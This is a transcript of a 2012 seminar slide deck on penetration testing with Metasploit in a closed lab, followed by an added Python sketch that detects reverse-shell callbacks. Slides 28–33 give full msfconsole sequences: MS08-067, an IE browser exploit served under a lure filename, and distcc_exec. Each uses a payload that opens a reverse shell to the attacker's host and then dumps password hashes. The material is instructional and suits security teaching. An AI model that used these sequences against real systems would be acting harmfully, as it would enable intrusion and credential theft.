Pentest with Metasploit

Published in: Technology

Transcript

  • 1. Penetration Testing with Metasploit
      Presented by Syarif. Seminar IT Security: Safe The System. Sumedang, April 29 2012, STMIK Sumedang
  • 2. Agenda
      • Why & What’s Penetration Testing (Pentest)
      • << back|track Overview
      • Metasploit Basics & Meterpreter
      • DEMO :)
  • 3. Whoami
      • Geek & pentester
      • InfoSec trouble maker
      • InfoSec enthusiast
      • CyberCrime investigator
      • Lecturer & engineer
  • 4. Why Pentest?
      • Millions of dollars have been invested in security programs to protect critical infrastructure and prevent data breaches *1)
      • A penetration test is one of the most effective ways to identify weaknesses and deficiencies in these programs *1)
  • 5. What’s Penetration Testing
      • A method to evaluate the security of a computer system / network
      • Practice (attacking) an IT system like a ‘hacker’ does
      • Find security holes (weaknesses)
      • Bypass security mechanisms
      • Compromise an organization’s IT system security
      Must have permission from the IT system owner! Illegal activity puts you in jail.
  • 6. Ethics
      • Think before you act
      • Don’t be stupid
      • Don’t be malicious
  • 7. Pentest Phases
      • Vulnerability Analysis
      • Information Gathering
      • Exploitation
      • Post Exploitation
      • Reporting
  • 8. << back|track overview
      • Let’s watch the video :)
  • 9. << back|track overview
      • The Most Advanced Linux Security Distribution
      • Open Source & Always be Developed
      • for Security Professional
      • Real World Pentesting Tools
  • 10. << back|track overview
  • 11. << back|track overview
  • 12. What’s
      • Not just a tool, but an entire framework *1)
      • An open source platform for writing security tools and exploits *2)
      • Easily build attack vectors to add its exploits, payloads, encoders,
      • Create and execute more advanced attacks
      • Ruby based
  • 13. Metasploit interfaces
      • MSFconsole
      • MSFcli
      • msfweb, msfgui (discontinued)
      • Metasploit Pro, Metasploit Express
      • Armitage
  • 14. MSFconsole
  • 15. MSFcli
  • 16. Metasploit Terminology
      • Exploit: code that allows a pentester to take advantage of a flaw within a system, application, or service *1)
      • Payload: code that we want the target system to execute (a few commands to be executed on the target system) *1)
      • Shellcode: a set of instructions used as the payload when exploitation occurs *1)
      • Module: a piece of software that can be used by Metasploit *1)
      • Listener: a component that waits for an incoming connection *1)
  • 17. How does exploitation work
      (diagram: attacker and vulnerable server)
      • 1: exploit + payload
      • 2: exploit runs, then payload runs
      • 3: Upload / Download data
  • 18. Traditional Pentest vs Metasploit
      • Traditional Pentest: Public Exploit Gathering, Change offsets, Replace ShellCode
      • Metasploit for Pentest: Load Metasploit, Choose the target OS, Use exploit, SET Payload, Execute
  • 19. Meterpreter
      • Used as a payload after a vulnerability is exploited *1)
      • Improves post exploitation
  • 20. Meterpreter
      • Exploiting a vulnerability
      • Select a meterpreter as a payload
      • meterpreter shell
  • 21. Meterpreter command
  • 22. Meterpreter command
  • 23. Meterpreter command
  • 24. Meterpreter command
  • 25. Meterpreter command
  • 26. Pentest Scenario
      (diagram: attacker and vulnerable OS on VMware *)
      * : Ubuntu 8.04 Metasploitable
  • 27. OS in the Lab
      • BackTrack 5 R2, IP address: 172.16.240.143
      • Windows XP SP2, IP address: 172.16.240.129
      • Windows 2003 Server, IP address: 172.16.240.141
      • Windows 7, IP address: 172.16.240.142
      • Ubuntu Linux 8.04 (Metasploitable), IP address: 172.16.240.144
  • 28. Windows XP Exploitation
      • msf > search windows/smb
      • msf > info exploit/windows/smb/ms08_067_netapi
      • msf > use exploit/windows/smb/ms08_067_netapi
      • msf exploit(ms08_067_netapi) > show payloads
      • msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
      • msf exploit(ms08_067_netapi) > show options
      • msf exploit(ms08_067_netapi) > set RHOST 172.16.240.129
      • msf exploit(ms08_067_netapi) > set LHOST 172.16.240.143
      • msf exploit(ms08_067_netapi) > show options
      • msf exploit(ms08_067_netapi) > exploit
      • meterpreter > background
      • sessions -l
  • 29. Windows XP Post Exploitation
      • sessions -i 1
      • meterpreter > getsystem -h
      • getuid
      • hashdump
  • 30. Windows 2003 Server Exploitation
      • msf > search windows/smb
      • msf > info exploit/windows/smb/ms08_067_netapi
      • msf > use exploit/windows/smb/ms08_067_netapi
      • msf exploit(ms08_067_netapi) > show payloads
      • msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
      • msf exploit(ms08_067_netapi) > show options
      • msf exploit(ms08_067_netapi) > set RHOST 172.16.240.129
      • msf exploit(ms08_067_netapi) > set LHOST 172.16.240.143
      • msf exploit(ms08_067_netapi) > show options
      • msf exploit(ms08_067_netapi) > exploit
      • meterpreter > background
      • sessions -l
  • 31. Windows 7 Exploitation
      • msf > use exploit/windows/browser/ms11_003_ie_css_import
      • msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp
      • msf exploit(ms11_003_ie_css_import) > show options
      • msf exploit(ms11_003_ie_css_import) > set SRVHOST 172.16.240.143
      • msf exploit(ms11_003_ie_css_import) > set SRVPORT 80
      • msf exploit(ms11_003_ie_css_import) > set URIPATH miyabi-naked.avi
      • msf exploit(ms11_003_ie_css_import) > set LHOST 172.16.240.143
      • msf exploit(ms11_003_ie_css_import) > set LPORT 443
      • msf exploit(ms11_003_ie_css_import) > exploit
      Just wait until the victim opens the URL http://172.16.240.143:80/miyabi-naked.avi
  • 32. Windows 7 Exploitation
      • msf exploit(ms11_003_ie_css_import) > sessions -l
      • msf exploit(ms11_003_ie_css_import) > sessions -i 1
      • meterpreter > sysinfo
      • meterpreter > shell
  • 33. Ubuntu 8.04 Metasploitable Exploitation
      • search distcc
      • use exploit/unix/misc/distcc_exec
      • show payloads
      • set PAYLOAD cmd/unix/reverse
      • show options
      • set rhost 172.16.240.144
      • set lhost 172.16.240.143
      • exploit
  • 34. Any Questions? Contact me
      • website: http://fl3x.us
      • twitter: @fl3xu5
  • 35. Greet & Thanks To
      • BackTrack Linux
      • Metasploit Team (HD Moore & rapid7)
      • Offensive Security / Metasploit Unleashed
      • David Kennedy
      • Georgia Weidman
  • 36. References
      • 1. Metasploit: The Penetration Tester’s Guide. David Kennedy, Jim O’Gorman, Devon Kearns, Mati Aharoni
      • 2. http://www.metasploit.com
      • 3. http://www.offensive-security.com/metasploit-unleashed/Main_Page
      • 4. http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines
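
The server-side exploits on slides 28, 30 and 33 all pair a network service with a reverse payload, so the exploited host accepts a connection on SMB or distcc and then connects back to the same peer. The following detection sketch is an added example, not part of the original slides: the flow records are constructed, the 10-second window is an arbitrary choice, and callback port 4444 is assumed because it is Metasploit's default LPORT and the slides do not set one for these exploits.

```python
from collections import namedtuple

# Flow record: start time (s), initiator, responder, responder port.
Flow = namedtuple("Flow", "ts src dst dport")

# Constructed sample data (not captured traffic), using the lab addresses from slide 27.
SAMPLE_FLOWS = [
    Flow(100.0, "172.16.240.143", "172.16.240.129", 445),   # inbound SMB to the XP host
    Flow(101.2, "172.16.240.129", "172.16.240.143", 4444),  # XP host connects back to that peer
    Flow(200.0, "172.16.240.143", "172.16.240.144", 3632),  # inbound distcc to Metasploitable
    Flow(200.9, "172.16.240.144", "172.16.240.143", 4444),  # Metasploitable connects back
    Flow(300.0, "172.16.240.142", "172.16.240.141", 445),   # ordinary file-share access
    Flow(400.0, "172.16.240.141", "172.16.240.143", 80),    # outbound with no prior inbound
    Flow(500.0, "172.16.240.143", "172.16.240.141", 445),   # inbound SMB ...
    Flow(900.0, "172.16.240.141", "172.16.240.143", 443),   # ... callback far outside the window
]

# Services exploited in the lab: SMB (ms08_067_netapi) and distcc (distcc_exec).
WATCHED_PORTS = {445: "smb", 3632: "distcc"}


def find_callbacks(flows, window=10.0, watched=WATCHED_PORTS):
    """Flag hosts that accept a connection on a watched service port and then,
    within `window` seconds, open a connection back to the same peer."""
    last_inbound = {}  # (server, client) -> (time, service port) of latest inbound
    alerts = []
    for f in sorted(flows, key=lambda r: r.ts):
        hit = last_inbound.get((f.src, f.dst))
        if hit is not None and f.ts - hit[0] <= window:
            alerts.append({
                "host": f.src,                 # machine that called back
                "peer": f.dst,                 # where it connected
                "service": watched[hit[1]],    # service it was serving just before
                "callback_port": f.dport,
                "delay": round(f.ts - hit[0], 1),
            })
        if f.dport in watched:
            last_inbound[(f.dst, f.src)] = (f.ts, f.dport)
    return alerts


if __name__ == "__main__":
    for alert in find_callbacks(SAMPLE_FLOWS):
        print(alert)
```

The browser-delivered case on slide 31 never involves an inbound connection to the victim, so this correlation does not cover it; that case needs proxy or egress logs showing a workstation fetching a page and then opening a second connection to the same server.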
